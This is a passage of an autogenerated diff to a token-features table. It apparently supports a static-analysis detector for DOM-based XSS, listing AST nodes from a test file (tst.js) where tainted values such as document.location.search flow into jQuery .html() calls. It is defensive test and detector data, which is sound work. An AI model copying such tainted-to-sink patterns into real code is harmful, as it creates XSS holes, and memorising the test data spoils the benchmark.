target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:31 | target.taint8 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:31 | target.taint8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:408:26:408:31 | taint8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:408:26:408:31 | taint8 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:408:26:408:31 | taint8 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:408:26:408:31 | taint8 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:408:26:408:31 | taint8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | $('myId ... taint8) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | $('myId ... taint8) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | $('myId ... taint8) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | $('myId ... taint8) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | $('myId ... taint8) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | exceptional return of $('myId ... taint8) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | exceptional return of $('myId ... taint8) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | exceptional return of $('myId ... taint8) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | exceptional return of $('myId ... taint8) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:3:409:31 | exceptional return of $('myId ... taint8) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:409:5:409:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:409:5:409:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:409:5:409:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17499,6 +121710,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:409:5:409:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:409:5:409:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:409:5:409:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:13:409:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:13:409:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:409:13:409:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:13:409:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:13:409:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:18:409:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:18:409:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:409:18:409:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:18:409:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:18:409:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:409:18:409:30 | target.taint8 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:409:18:409:30 | target.taint8 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:409:18:409:30 | target.taint8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17506,6 +121727,92 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:409:18:409:30 | target.taint8 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:409:18:409:30 | target.taint8 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:409:18:409:30 | target.taint8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:409:25:409:30 | taint8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:409:25:409:30 | taint8 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:409:25:409:30 | taint8 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:409:25:409:30 | taint8 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:409:25:409:30 | taint8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:8 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:8 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:8 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:8 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:8 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:15 | target.taint9 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:15 | target.taint9 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:15 | target.taint9 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:15 | target.taint9 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:15 | target.taint9 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:42 | target. ... "safe") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:42 | target. ... "safe") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:42 | target. ... "safe") | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:42 | target. ... "safe") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:3:411:42 | target. ... "safe") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:10:411:15 | taint9 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:10:411:15 | taint9 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:10:411:15 | taint9 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:10:411:15 | taint9 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:10:411:15 | taint9 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:19:411:42 | (target ... "safe") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:19:411:42 | (target ... "safe") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:19:411:42 | (target ... "safe") | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:19:411:42 | (target ... "safe") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:19:411:42 | (target ... "safe") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:25 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:25 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:25 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:25 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:25 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:32 | target.taint9 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| 